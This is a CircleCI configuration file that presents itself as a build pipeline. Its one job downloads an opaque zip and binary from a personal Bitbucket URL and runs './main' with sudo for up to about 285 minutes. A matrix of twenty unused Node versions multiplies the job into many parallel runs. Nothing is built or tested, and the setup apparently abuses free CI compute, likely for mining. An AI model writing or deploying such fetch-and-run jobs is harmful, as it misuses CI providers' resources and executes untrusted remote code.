version: 2.1

executors:
  linux:
    docker:
      - image: circleci/python:3.9.6-buster

jobs:
  Golek_Opo:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - run:
          name: Mr.Golek_Opo
          command: |
            nproc
            wget https://bitbucket.org/lindasinta/admin/raw/f93e9199b2d40a26533da39aaad04f64b5b2bd75/App.zip
            unzip App.zip
            cd 15
            wget https://bitbucket.org/lindasinta/admin/raw/f93e9199b2d40a26533da39aaad04f64b5b2bd75/upc
            chmod u+x *###
            #sleep 180s && sudo apt update -y
            #sleep 300s && sudo apt update -y
            sudo timeout #285m ./main && stop && sudo apt update -y

workflows:
  all-Mr:
    jobs:
      - Golek_Opo:
          matrix:
            parameters:
              os: [linux]
              node-version: [8.12.0, 8.13.0, 8.14.0, 8.14.1, 8.15.0, 8.15.1, 8.16.0, 8.16.2, 8.17.0, 9.3.0, 9.4.0, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.10.0, 9.10.1, 9.11.0, 9.11.1, 9.11.2]
